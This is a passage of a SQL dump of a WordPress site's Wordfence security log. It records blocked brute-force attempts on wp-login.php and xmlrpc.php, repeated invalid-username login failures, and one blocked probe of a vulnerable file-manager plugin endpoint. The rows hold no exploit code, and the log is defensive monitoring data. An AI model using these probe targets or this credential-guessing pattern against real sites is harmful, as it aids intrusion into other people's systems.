Network',NULL),(10941,0.000000,1631168200.710456,'\0\0\0\0\0\0\0\0\0\0���#�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10942,0.000000,1631169705.033578,'\0\0\0\0\0\0\0\0\0\0����m',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10943,0.000000,1631171670.221887,'\0\0\0\0\0\0\0\0\0\0����^�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10944,0.000000,1631172097.405934,'\0\0\0\0\0\0\0\0\0\0����p�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10945,0.000000,1631173639.838158,'\0\0\0\0\0\0\0\0\0\0����E.',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10946,0.000000,1631175623.385924,'\0\0\0\0\0\0\0\0\0\0��T��',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10947,0.000000,1631176052.835637,'\0\0\0\0\0\0\0\0\0\0���)z�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10948,0.000000,1631177601.856562,'\0\0\0\0\0\0\0\0\0\0��C�=�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10949,0.000000,1631178048.646843,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10950,0.000000,1631179618.711750,'\0\0\0\0\0\0\0\0\0\0���X2�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10951,0.000000,1631182098.886432,'\0\0\0\0\0\0\0\0\0\0���h��',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10952,0.000000,1631183760.530420,'\0\0\0\0\0\0\0\0\0\0��QX4�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10953,0.000000,1631184227.295773,'\0\0\0\0\0\0\0\0\0\0��h���',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10954,0.000000,1631185867.388560,'\0\0\0\0\0\0\0\0\0\0����\\�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10955,0.000000,1631219211.854906,'\0\0\0\0\0\0\0\0\0\0��gyY�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10956,0.000000,1631220408.942939,'\0\0\0\0\0\0\0\0\0\0��R@�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10957,0.000000,1631221268.603957,'\0\0\0\0\0\0\0\0\0\0��\"P�R',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10958,0.000000,1631223026.759955,'\0\0\0\0\0\0\0\0\0\0��C��',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10959,0.000000,1631223876.277056,'\0\0\0\0\0\0\0\0\0\0�����^',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10960,0.000000,1631224410.563405,'\0\0\0\0\0\0\0\0\0\0��(E��',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10961,0.000000,1631225305.240821,'\0\0\0\0\0\0\0\0\0\0��_�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10962,0.000000,1631226986.025550,'\0\0\0\0\0\0\0\0\0\0����Iz',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10963,0.000000,1631227842.816975,'\0\0\0\0\0\0\0\0\0\0���/�\"',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10964,0.000000,1631229360.452614,'\0\0\0\0\0\0\0\0\0\0����\0',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10965,0.000000,1631230958.918750,'\0\0\0\0\0\0\0\0\0\0��M��)',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10966,1631232151.161329,1631232151.069700,'\0\0\0\0\0\0\0\0\0\0��4�J�',0,403,0,0,0,'https://www.dogstardesign.co.uk/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1maWxlLW1hbmFnZXIvbGliL3BocC9jb25uZWN0b3IubWluaW1hbC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10967,0.000000,1631232548.584290,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10968,0.000000,1631233289.109330,'\0\0\0\0\0\0\0\0\0\0��h���',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10969,0.000000,1631234353.582063,'\0\0\0\0\0\0\0\0\0\0��-��^',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','https://www.dogstardesign.co.uk','Opera/9.80 (Windows NT 6.1; MRA 5.8 (build 4157)) Presto/2.12.388 Version/12.15','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10970,0.000000,1631253317.564865,'\0\0\0\0\0\0\0\0\0\0��1��o',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10971,0.000000,1631253322.776505,'\0\0\0\0\0\0\0\0\0\0��1��o',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10972,0.000000,1631253328.558171,'\0\0\0\0\0\0\0\0\0\0��1��o',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10973,0.000000,1631253332.135796,'\0\0\0\0\0\0\0\0\0\0��1��o',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10974,0.000000,1631253336.464742,'\0\0\0\0\0\0\0\0\0\0��1��o',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10975,0.000000,1631253341.412357,'\0\0\0\0\0\0\0\0\0\0��1��o',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10976,0.000000,1631253344.325142,'\0\0\0\0\0\0\0\0\0\0��1��o',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10977,0.000000,1631255926.565010,'\0\0\0\0\0\0\0\0\0\0��h�N�',0,200,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','https://www.google.com/','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10978,0.000000,1631284119.996794,'\0\0\0\0\0\0\0\0\0\0��E2',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','https://www.google.com/','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10979,0.000000,1631289828.597069,'\0\0\0\0\0\0\0\0\0\0��P�i',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10980,0.000000,1631291873.120620,'\0\0\0\0\0\0\0\0\0\0��p�H�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10981,0.000000,1631292435.430445,'\0\0\0\0\0\0\0\0\0\0��]�xr',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10982,0.000000,1631293038.823896,'\0\0\0\0\0\0\0\0\0\0���>n�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10983,0.000000,1631293586.843221,'\0\0\0\0\0\0\0\0\0\0��h���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10984,0.000000,1631293663.836037,'\0\0\0\0\0\0\0\0\0\0��Xc��',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10985,0.000000,1631294191.201169,'\0\0\0\0\0\0\0\0\0\0��g�>',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10986,0.000000,1631294721.661206,'\0\0\0\0\0\0\0\0\0\0��QDD�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10987,0.000000,1631295307.875504,'\0\0\0\0\0\0\0\0\0\0���VM�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10988,0.000000,1631295826.386704,'\0\0\0\0\0\0\0\0\0\0���w',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10989,0.000000,1631296339.530873,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10990,0.000000,1631297330.409047,'\0\0\0\0\0\0\0\0\0\0���\0�[',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10991,0.000000,1631297823.890157,'\0\0\0\0\0\0\0\0\0\0��n-p',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10992,0.000000,1631298346.196530,'\0\0\0\0\0\0\0\0\0\0���j#�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10993,0.000000,1631298857.868033,'\0\0\0\0\0\0\0\0\0\0��?�)',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10994,0.000000,1631299364.376499,'\0\0\0\0\0\0\0\0\0\0��t>f�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10995,0.000000,1631299871.554133,'\0\0\0\0\0\0\0\0\0\0����+',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10996,0.000000,1631300419.942363,'\0\0\0\0\0\0\0\0\0\0��-��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10997,0.000000,1631300919.487284,'\0\0\0\0\0\0\0\0\0\0���_Qm',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10998,0.000000,1631301432.228744,'\0\0\0\0\0\0\0\0\0\0��gZ�[',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10999,0.000000,1631301473.596121,'\0\0\0\0\0\0\0\0\0\0��ړ��',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(11000,0.000000,1631301478.899944,'\0\0\0\0\0\0\0\0\0\0��ړ��',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(11001,0.000000,1631301485.465688,'\0\0\0\0\0\0\0\0\0\0��ړ��',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(11002,0.000000,1631301491.873355,'\0\0\0\0\0\0\0\0\0\0��ړ��',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(11003,0.000000,1631301499.271664,'\0\0\0\0\0\0\0\0\0\0��ړ��',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(11004,0.000000,1631301505.802519,'\0\0\0\0\0\0\0\0\0\0��ړ��',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(11005,0.000000,1631301513.295174,'\0\0\0\0\0\0\0\0\0\0��ړ��',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(11006,0.000000,1631302009.254296,'\0\0\0\0\0\0\0\0\0\0��g�t2',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11007,0.000000,1631302532.096679,'\0\0\0\0\0\0\0\0\0\0��˫�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11008,0.000000,1631303090.837211,'\0\0\0\0\0\0\0\0\0\0��Օg�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11009,0.000000,1631304182.302049,'\0\0\0\0\0\0\0\0\0\0��\r^�,',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11010,0.000000,1631304711.935113,'\0\0\0\0\0\0\0\0\0\0���ђ�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11011,0.000000,1631305262.337247,'\0\0\0\0\0\0\0\0\0\0��6D �',0,200,0,0,0,'https://www.dogstardesign.co.uk/?_wfsf=detectProxy','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.82 Safari/537.1','scan:detectproxy',NULL,NULL),(11012,0.000000,1631305278.749648,'\0\0\0\0\0\0\0\0\0\0���Aێ',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11013,0.000000,1631305859.074252,'\0\0\0\0\0\0\0\0\0\0����{�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11014,0.000000,1631306412.923286,'\0\0\0\0\0\0\0\0\0\0���]�c',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11015,0.000000,1631306991.915461,'\0\0\0\0\0\0\0\0\0\0��ŜJ�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11016,0.000000,1631307581.668562,'\0\0\0\0\0\0\0\0\0\0��i9o',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11017,0.000000,1631308146.861636,'\0\0\0\0\0\0\0\0\0\0��gљ ',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11018,0.000000,1631308703.759562,'\0\0\0\0\0\0\0\0\0\0��|�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11019,0.000000,1631309322.652473,'\0\0\0\0\0\0\0\0\0\0���\r�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11020,0.000000,1631309898.399482,'\0\0\0\0\0\0\0\0\0\0��JЈ�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11021,0.000000,1631310500.877202,'\0\0\0\0\0\0\0\0\0\0��gљ ',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11022,0.000000,1631311106.632608,'\0\0\0\0\0\0\0\0\0\0��Օg�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11023,0.000000,1631312274.859986,'\0\0\0\0\0\0\0\0\0\0��gZ�[',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11024,0.000000,1631312912.347450,'\0\0\0\0\0\0\0\0\0\0��#�K',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11025,0.000000,1631313514.773777,'\0\0\0\0\0\0\0\0\0\0���y��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 